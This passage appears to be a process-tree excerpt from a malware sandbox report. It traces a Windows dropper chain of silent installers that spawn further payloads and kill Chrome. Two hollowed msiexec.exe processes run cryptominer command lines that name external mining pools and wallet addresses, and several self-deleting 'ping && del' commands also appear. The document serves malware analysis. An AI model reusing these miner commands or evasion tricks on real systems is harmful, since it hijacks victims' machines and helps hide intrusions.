C:\Users\Admin\AppData\Local\Temp\3kb45wrj.qnv\app.exeC:\Users\Admin\AppData\Local\Temp\3kb45wrj.qnv\app.exe /8-22228⤵PID:7188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01s14st4.jr0\file.exe & exit7⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\01s14st4.jr0\file.exeC:\Users\Admin\AppData\Local\Temp\01s14st4.jr0\file.exe8⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"9⤵PID:3236
-
C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\multitimer.exe" 1 3.1617397820.6067883c3d12f 10111⤵PID:4048
-
C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\multitimer.exe" 2 3.1617397820.6067883c3d12f12⤵PID:9104
-
C:\Users\Admin\AppData\Local\Temp\ydr3bady21b\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ydr3bady21b\cpyrix.exe" /VERYSILENT13⤵PID:7848
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:7972
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:7800
-
-
-
C:\Users\Admin\AppData\Local\Temp\uttx0yp24qx\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\uttx0yp24qx\Setup3310.exe" /Verysilent /subid=57713⤵PID:7796
-
C:\Users\Admin\AppData\Local\Temp\is-V2HK5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-V2HK5.tmp\Setup3310.tmp" /SL5="$206FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\uttx0yp24qx\Setup3310.exe" /Verysilent /subid=57714⤵PID:8888
-
-
-
C:\Users\Admin\AppData\Local\Temp\jfxgnd4abck\app.exe"C:\Users\Admin\AppData\Local\Temp\jfxgnd4abck\app.exe" /8-2313⤵PID:7436
-
-
C:\Users\Admin\AppData\Local\Temp\obxm4ks0zdy\vpn.exe"C:\Users\Admin\AppData\Local\Temp\obxm4ks0zdy\vpn.exe" /silent /subid=48213⤵PID:8500
-
C:\Users\Admin\AppData\Local\Temp\is-899ME.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-899ME.tmp\vpn.tmp" /SL5="$20646,15170975,270336,C:\Users\Admin\AppData\Local\Temp\obxm4ks0zdy\vpn.exe" /silent /subid=48214⤵PID:5452
-
-
-
C:\Users\Admin\AppData\Local\Temp\vbksncapbo4\zhnoaxhn52f.exe"C:\Users\Admin\AppData\Local\Temp\vbksncapbo4\zhnoaxhn52f.exe" /ustwo INSTALL13⤵PID:7212
-
-
C:\Users\Admin\AppData\Local\Temp\ynqexxla322\vict.exe"C:\Users\Admin\AppData\Local\Temp\ynqexxla322\vict.exe" /VERYSILENT /id=53513⤵PID:9016
-
C:\Users\Admin\AppData\Local\Temp\is-B2OOO.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-B2OOO.tmp\vict.tmp" /SL5="$1082C,870426,780800,C:\Users\Admin\AppData\Local\Temp\ynqexxla322\vict.exe" /VERYSILENT /id=53514⤵PID:8036
-
C:\Users\Admin\AppData\Local\Temp\is-8OBME.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-8OBME.tmp\win1host.exe" 53515⤵PID:7652
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PLCHPOPPJ5\setups.exe"C:\Users\Admin\AppData\Local\Temp\PLCHPOPPJ5\setups.exe" ll10⤵PID:7552
-
C:\Users\Admin\AppData\Local\Temp\is-1CLFD.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-1CLFD.tmp\setups.tmp" /SL5="$B0462,635399,250368,C:\Users\Admin\AppData\Local\Temp\PLCHPOPPJ5\setups.exe" ll11⤵PID:7512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"9⤵PID:4752
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:3236
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"9⤵PID:7764
-
C:\Users\Admin\AppData\Roaming\5E34.tmp.exe"C:\Users\Admin\AppData\Roaming\5E34.tmp.exe"10⤵PID:9004
-
C:\Users\Admin\AppData\Roaming\5E34.tmp.exe"C:\Users\Admin\AppData\Roaming\5E34.tmp.exe"11⤵PID:7860
-
-
-
C:\Users\Admin\AppData\Roaming\8499.tmp.exe"C:\Users\Admin\AppData\Roaming\8499.tmp.exe"10⤵PID:9052
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:7252
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:8872
-
-
-
C:\Users\Admin\AppData\Roaming\8517.tmp.exe"C:\Users\Admin\AppData\Roaming\8517.tmp.exe"10⤵PID:9072
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"10⤵PID:8844
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:8644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"9⤵PID:8776
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fd2tr2sn.0tf\Four.exe & exit7⤵PID:7980
-
C:\Users\Admin\AppData\Local\Temp\fd2tr2sn.0tf\Four.exeC:\Users\Admin\AppData\Local\Temp\fd2tr2sn.0tf\Four.exe8⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\OHPXW57SE3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OHPXW57SE3\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\OHPXW57SE3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OHPXW57SE3\multitimer.exe" 1 3.1617397819.6067883b59956 10410⤵PID:7372
-
C:\Users\Admin\AppData\Local\Temp\OHPXW57SE3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OHPXW57SE3\multitimer.exe" 2 3.1617397819.6067883b5995611⤵PID:8288
-
C:\Users\Admin\AppData\Local\Temp\zvpgopsfh2h\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\zvpgopsfh2h\cpyrix.exe" /VERYSILENT12⤵PID:9164
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵PID:7664
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵PID:8604
-
-
-
C:\Users\Admin\AppData\Local\Temp\aa2qudnp2c3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\aa2qudnp2c3\Setup3310.exe" /Verysilent /subid=57712⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\is-SLHG8.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SLHG8.tmp\Setup3310.tmp" /SL5="$605FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\aa2qudnp2c3\Setup3310.exe" /Verysilent /subid=57713⤵PID:8876
-
-
-
C:\Users\Admin\AppData\Local\Temp\tpo04retage\vict.exe"C:\Users\Admin\AppData\Local\Temp\tpo04retage\vict.exe" /VERYSILENT /id=53512⤵PID:6444
-
C:\Users\Admin\AppData\Local\Temp\is-8QOO6.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-8QOO6.tmp\vict.tmp" /SL5="$5053A,870426,780800,C:\Users\Admin\AppData\Local\Temp\tpo04retage\vict.exe" /VERYSILENT /id=53513⤵PID:8040
-
C:\Users\Admin\AppData\Local\Temp\is-VM6UI.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-VM6UI.tmp\win1host.exe" 53514⤵PID:4108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tgamu1lodyp\qpe3iqzdd1g.exe"C:\Users\Admin\AppData\Local\Temp\tgamu1lodyp\qpe3iqzdd1g.exe" /ustwo INSTALL12⤵PID:7216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7216 -s 65213⤵
- Program crash
PID:1860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7216 -s 66413⤵
- Program crash
PID:772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7216 -s 67613⤵
- Program crash
PID:7292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7216 -s 70813⤵
- Program crash
PID:3664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7216 -s 88413⤵
- Program crash
PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\3xsqnc45oqo\vpn.exe"C:\Users\Admin\AppData\Local\Temp\3xsqnc45oqo\vpn.exe" /silent /subid=48212⤵PID:8740
-
C:\Users\Admin\AppData\Local\Temp\is-1O7U1.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-1O7U1.tmp\vpn.tmp" /SL5="$80446,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3xsqnc45oqo\vpn.exe" /silent /subid=48213⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\r2bothvne4f\app.exe"C:\Users\Admin\AppData\Local\Temp\r2bothvne4f\app.exe" /8-2312⤵PID:6500
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\76-85876-b6d-4af8b-f602085f0753a\Dicijehuvi.exe"C:\Users\Admin\AppData\Local\Temp\76-85876-b6d-4af8b-f602085f0753a\Dicijehuvi.exe"6⤵PID:6156
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:4404
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\is-6NR3C.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-6NR3C.tmp\lylal220.tmp" /SL5="$501D0,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\is-NHH01.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-NHH01.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:6708
-
C:\Program Files\MSBuild\IEFZYADBOE\irecord.exe"C:\Program Files\MSBuild\IEFZYADBOE\irecord.exe" /VERYSILENT6⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\is-IIADF.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-IIADF.tmp\irecord.tmp" /SL5="$3034A,6265333,408064,C:\Program Files\MSBuild\IEFZYADBOE\irecord.exe" /VERYSILENT7⤵PID:6612
-
-
-
C:\Users\Admin\AppData\Local\Temp\8f-f23b3-70d-63789-759b427e10ce0\Vomykyxico.exe"C:\Users\Admin\AppData\Local\Temp\8f-f23b3-70d-63789-759b427e10ce0\Vomykyxico.exe"6⤵PID:4648
-
-
C:\Users\Admin\AppData\Local\Temp\67-0a527-fd2-28784-7a9167c05df08\Mydajaegewae.exe"C:\Users\Admin\AppData\Local\Temp\67-0a527-fd2-28784-7a9167c05df08\Mydajaegewae.exe"6⤵PID:6420
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xpgekp31.cbl\md6_6ydj.exe & exit7⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\xpgekp31.cbl\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\xpgekp31.cbl\md6_6ydj.exe8⤵PID:6376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ehqgpw3m.bsb\askinstall31.exe & exit7⤵PID:6716
-
C:\Users\Admin\AppData\Local\Temp\ehqgpw3m.bsb\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ehqgpw3m.bsb\askinstall31.exe8⤵PID:6812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phfbuhjy.5a4\toolspab1.exe & exit7⤵PID:6700
-
C:\Users\Admin\AppData\Local\Temp\phfbuhjy.5a4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\phfbuhjy.5a4\toolspab1.exe8⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\phfbuhjy.5a4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\phfbuhjy.5a4\toolspab1.exe9⤵PID:5224
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qfzwklvq.rs1\setup_10.2_mix.exe & exit7⤵PID:6044
-
C:\Users\Admin\AppData\Local\Temp\qfzwklvq.rs1\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\qfzwklvq.rs1\setup_10.2_mix.exe8⤵PID:7936
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "9⤵PID:5072
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a5kzlsd4.gto\GcleanerWW.exe /mixone & exit7⤵PID:7256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\klp3qomw.rqa\app.exe /8-2222 & exit7⤵PID:7424
-
C:\Users\Admin\AppData\Local\Temp\klp3qomw.rqa\app.exeC:\Users\Admin\AppData\Local\Temp\klp3qomw.rqa\app.exe /8-22228⤵PID:6040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lptjm4yh.2nc\file.exe & exit7⤵PID:8088
-
C:\Users\Admin\AppData\Local\Temp\lptjm4yh.2nc\file.exeC:\Users\Admin\AppData\Local\Temp\lptjm4yh.2nc\file.exe8⤵PID:7452
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:6044
-
C:\Users\Admin\AppData\Local\Temp\2M7Q10CMF0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2M7Q10CMF0\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\2M7Q10CMF0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2M7Q10CMF0\multitimer.exe" 1 3.1617397823.6067883f0df22 10111⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\2M7Q10CMF0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2M7Q10CMF0\multitimer.exe" 2 3.1617397823.6067883f0df2212⤵PID:8380
-
C:\Users\Admin\AppData\Local\Temp\mitu2ujv2zd\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\mitu2ujv2zd\Setup3310.exe" /Verysilent /subid=57713⤵PID:2832
-
C:\Users\Admin\AppData\Local\Temp\is-BBTD0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-BBTD0.tmp\Setup3310.tmp" /SL5="$206C2,138429,56832,C:\Users\Admin\AppData\Local\Temp\mitu2ujv2zd\Setup3310.exe" /Verysilent /subid=57714⤵PID:8400
-
-
-
C:\Users\Admin\AppData\Local\Temp\l05s1zotn4c\vict.exe"C:\Users\Admin\AppData\Local\Temp\l05s1zotn4c\vict.exe" /VERYSILENT /id=53513⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\is-F9TN4.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-F9TN4.tmp\vict.tmp" /SL5="$407AA,870426,780800,C:\Users\Admin\AppData\Local\Temp\l05s1zotn4c\vict.exe" /VERYSILENT /id=53514⤵PID:7920
-
-
-
C:\Users\Admin\AppData\Local\Temp\2cyiojhszhe\zjel0zcwhpb.exe"C:\Users\Admin\AppData\Local\Temp\2cyiojhszhe\zjel0zcwhpb.exe" /ustwo INSTALL13⤵PID:8672
-
-
C:\Users\Admin\AppData\Local\Temp\xx0nlus1sku\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\xx0nlus1sku\cpyrix.exe" /VERYSILENT13⤵PID:8848
-
-
C:\Users\Admin\AppData\Local\Temp\djkrbgly1n0\vpn.exe"C:\Users\Admin\AppData\Local\Temp\djkrbgly1n0\vpn.exe" /silent /subid=48213⤵PID:7148
-
C:\Users\Admin\AppData\Local\Temp\is-LS9N3.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-LS9N3.tmp\vpn.tmp" /SL5="$406E4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\djkrbgly1n0\vpn.exe" /silent /subid=48214⤵PID:8968
-
-
-
C:\Users\Admin\AppData\Local\Temp\twlf5ybfa2u\app.exe"C:\Users\Admin\AppData\Local\Temp\twlf5ybfa2u\app.exe" /8-2313⤵PID:668
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WVFUH3WW3O\setups.exe"C:\Users\Admin\AppData\Local\Temp\WVFUH3WW3O\setups.exe" ll10⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\is-QOEE8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-QOEE8.tmp\setups.tmp" /SL5="$105DE,635399,250368,C:\Users\Admin\AppData\Local\Temp\WVFUH3WW3O\setups.exe" ll11⤵PID:4332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:7780
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:7484
-
C:\Users\Admin\AppData\Roaming\35BD.tmp.exe"C:\Users\Admin\AppData\Roaming\35BD.tmp.exe"10⤵PID:8044
-
C:\Users\Admin\AppData\Roaming\35BD.tmp.exe"C:\Users\Admin\AppData\Roaming\35BD.tmp.exe"11⤵PID:7660
-
-
-
C:\Users\Admin\AppData\Roaming\3959.tmp.exe"C:\Users\Admin\AppData\Roaming\3959.tmp.exe"10⤵PID:6044
-
-
C:\Users\Admin\AppData\Roaming\38BB.tmp.exe"C:\Users\Admin\AppData\Roaming\38BB.tmp.exe"10⤵PID:2112
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:6048
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:7648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:7768
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:9132
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:8208
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxjnnole.z0w\Four.exe & exit7⤵PID:7216
-
C:\Users\Admin\AppData\Local\Temp\oxjnnole.z0w\Four.exeC:\Users\Admin\AppData\Local\Temp\oxjnnole.z0w\Four.exe8⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\AZDZE451Y9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\AZDZE451Y9\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:7708
-
C:\Users\Admin\AppData\Local\Temp\AZDZE451Y9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\AZDZE451Y9\multitimer.exe" 1 3.1617397822.6067883e0931f 10410⤵PID:580
-
C:\Users\Admin\AppData\Local\Temp\AZDZE451Y9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\AZDZE451Y9\multitimer.exe" 2 3.1617397822.6067883e0931f11⤵PID:8280
-
C:\Users\Admin\AppData\Local\Temp\efej2daayye\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\efej2daayye\cpyrix.exe" /VERYSILENT12⤵PID:7136
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵PID:8764
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵PID:4600
-
-
-
C:\Users\Admin\AppData\Local\Temp\neuwvskrlza\ugmjug5tk2k.exe"C:\Users\Admin\AppData\Local\Temp\neuwvskrlza\ugmjug5tk2k.exe" /ustwo INSTALL12⤵PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\qd5ak4g333d\app.exe"C:\Users\Admin\AppData\Local\Temp\qd5ak4g333d\app.exe" /8-2312⤵PID:8952
-
-
C:\Users\Admin\AppData\Local\Temp\1xe0l3d535n\vict.exe"C:\Users\Admin\AppData\Local\Temp\1xe0l3d535n\vict.exe" /VERYSILENT /id=53512⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\is-OU4G8.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-OU4G8.tmp\vict.tmp" /SL5="$307C6,870426,780800,C:\Users\Admin\AppData\Local\Temp\1xe0l3d535n\vict.exe" /VERYSILENT /id=53513⤵PID:7220
-
-
-
C:\Users\Admin\AppData\Local\Temp\pa4x3ykj5yg\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\pa4x3ykj5yg\Setup3310.exe" /Verysilent /subid=57712⤵PID:360
-
C:\Users\Admin\AppData\Local\Temp\is-8TF39.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8TF39.tmp\Setup3310.tmp" /SL5="$2083E,138429,56832,C:\Users\Admin\AppData\Local\Temp\pa4x3ykj5yg\Setup3310.exe" /Verysilent /subid=57713⤵PID:8516
-
-
-
C:\Users\Admin\AppData\Local\Temp\yj1ph3xf2ay\vpn.exe"C:\Users\Admin\AppData\Local\Temp\yj1ph3xf2ay\vpn.exe" /silent /subid=48212⤵PID:8668
-
C:\Users\Admin\AppData\Local\Temp\is-EBSIM.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-EBSIM.tmp\vpn.tmp" /SL5="$30700,15170975,270336,C:\Users\Admin\AppData\Local\Temp\yj1ph3xf2ay\vpn.exe" /silent /subid=48213⤵PID:2628
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BH6FFTIN2E\setups.exe"C:\Users\Admin\AppData\Local\Temp\BH6FFTIN2E\setups.exe" ll9⤵PID:8180
-
C:\Users\Admin\AppData\Local\Temp\is-LHL4D.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-LHL4D.tmp\setups.tmp" /SL5="$20570,635399,250368,C:\Users\Admin\AppData\Local\Temp\BH6FFTIN2E\setups.exe" ll10⤵PID:7680
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:1192
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:6672
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:6948
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"3⤵PID:5760
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:6300
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"3⤵PID:5104
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵PID:7024
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"5⤵PID:6716
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"6⤵PID:6956
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui6⤵PID:5240
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe7⤵PID:7692
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 7024 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"5⤵PID:8080
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 70246⤵
- Kills process with taskkill
PID:4400
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵PID:4524
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\VJAQFU4Q0P\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VJAQFU4Q0P\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:6224
-
C:\Users\Admin\AppData\Local\Temp\VJAQFU4Q0P\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VJAQFU4Q0P\multitimer.exe" 1 3.1617397730.606787e230edf 1035⤵PID:6356
-
C:\Users\Admin\AppData\Local\Temp\VJAQFU4Q0P\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VJAQFU4Q0P\multitimer.exe" 2 3.1617397730.606787e230edf6⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\bmytq1jtwxo\pgfv2g22lxx.exe"C:\Users\Admin\AppData\Local\Temp\bmytq1jtwxo\pgfv2g22lxx.exe" /ustwo INSTALL7⤵PID:4392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 6528⤵
- Program crash
PID:5056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 6688⤵
- Program crash
PID:6628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 6728⤵
- Program crash
PID:1728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 7008⤵
- Program crash
PID:4432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 8968⤵
- Program crash
PID:4584
-
-
